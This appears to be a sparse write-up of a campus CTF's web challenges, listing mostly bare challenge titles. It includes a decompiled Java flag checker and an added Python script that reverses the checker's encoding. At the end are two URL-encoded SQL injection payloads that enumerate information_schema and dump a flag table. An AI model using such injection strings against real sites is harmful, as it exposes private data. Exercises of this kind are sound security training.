4th Shangshi Campus CTF: web 1
RceMe
ezGame
Disguise
Ping
Are you from SQNU?
Look for the homepage
Through
Work through it step by step, following the challenge prompts.
File_download
Submit a POST request to get the file to download.
Decompile it:
/*
 * Decompiled with CFR 0.152.
 *
 * Could not load the following classes:
 *  javax.servlet.http.HttpServlet
 */
package com.ctf.flag;

import java.util.ArrayList;
import java.util.Scanner;
import javax.servlet.http.HttpServlet;

public class FlagManager
extends HttpServlet {
    public static void main(String[] args) {
        Scanner sc = new Scanner(System.in);
        System.out.println("Please input your flag: ");
        String str = sc.next();
        System.out.println("Your input is: ");
        System.out.println(str);
        char[] stringArr = str.toCharArray();
        FlagManager.Encrypt(stringArr);
    }

    public static void Encrypt(char[] arr) {
        ArrayList<Integer> Resultlist = new ArrayList<Integer>();
        for (int i = 0; i < arr.length; ++i) {
            // '+' binds tighter than '^' in Java, so this is (arr[i] + 38) ^ 0x30
            int result = (arr[i] + 38) ^ 0x30;
            Resultlist.add(result);
        }
        // Expected per-character values of the encoded flag
        int[] key = new int[]{110, 107, 185, 183, 183, 186, 103, 185, 99, 105,
            105, 187, 105, 99, 102, 184, 185, 103, 99, 108, 186, 107, 187, 99,
            183, 109, 105, 184, 102, 106, 106, 188, 109, 186, 111, 188};
        ArrayList<Integer> Keylist = new ArrayList<Integer>();
        for (int j = 0; j < key.length; ++j) {
            Keylist.add(key[j]);
        }
        // The decompiled listing in the write-up ends here.
    }
}
Then write a decryption script in Python to recover the flag,
which is
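An added example, not part of the original write-up: a Python script that inverts the `Encrypt()` transform against the `key` array from the decompiled class, and shows why the operator precedence of `arr[i] + 38 ^ 0x30` matters. The function names are this example's own.

```python
# Added example: inverse of FlagManager.Encrypt() from the decompiled class.
# KEY is copied from the `key` array in the listing; all function names are hypothetical.
KEY = [110, 107, 185, 183, 183, 186, 103, 185, 99, 105,
       105, 187, 105, 99, 102, 184, 185, 103, 99, 108, 186, 107, 187, 99,
       183, 109, 105, 184, 102, 106, 106, 188, 109, 186, 111, 188]

OFFSET = 38
MASK = 0x30


def encrypt(text):
    """Forward transform. Java parses `c + 38 ^ 0x30` as `(c + 38) ^ 0x30`."""
    return [(ord(c) + OFFSET) ^ MASK for c in text]


def decrypt(values):
    """Undo the steps in reverse order: XOR is its own inverse, then subtract."""
    out = []
    for v in values:
        plain = (v ^ MASK) - OFFSET
        if not 0x20 <= plain <= 0x7E:
            # A value outside printable ASCII means the transform was misread.
            raise ValueError(f"value {v} decodes to non-printable {plain}")
        out.append(chr(plain))
    return "".join(out)


def decrypt_misread(values):
    """Common mistake: reading the expression as c + (38 ^ 0x30), i.e. c + 22."""
    return [v - (OFFSET ^ MASK) for v in values]


if __name__ == "__main__":
    flag = decrypt(KEY)
    # Round-trip check: re-encoding the result must reproduce the key array.
    assert encrypt(flag) == KEY
    print(flag)
    # The misread precedence yields code points above 0x7E, so it cannot be right.
    print([v for v in decrypt_misread(KEY) if v > 0x7E][:3])
```

The round-trip assertion confirms the recovered string without needing the server.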
A Day Trip to Shangshi
Selfish Little s
Go to end.php
Little Query System
id=-1%27%20UNION%20SELECT%201,group_concat(column_name),3%20FROM%20information_schema.columns%20WHERE%20table_schema%20=%20%27ctf%27%20AND%20table_name%20=%20%27flag%27--+
?id=-1%27%20UNION%20SELECT%201,value,group_concat(value)%20from%20ctf.flag%20%20--+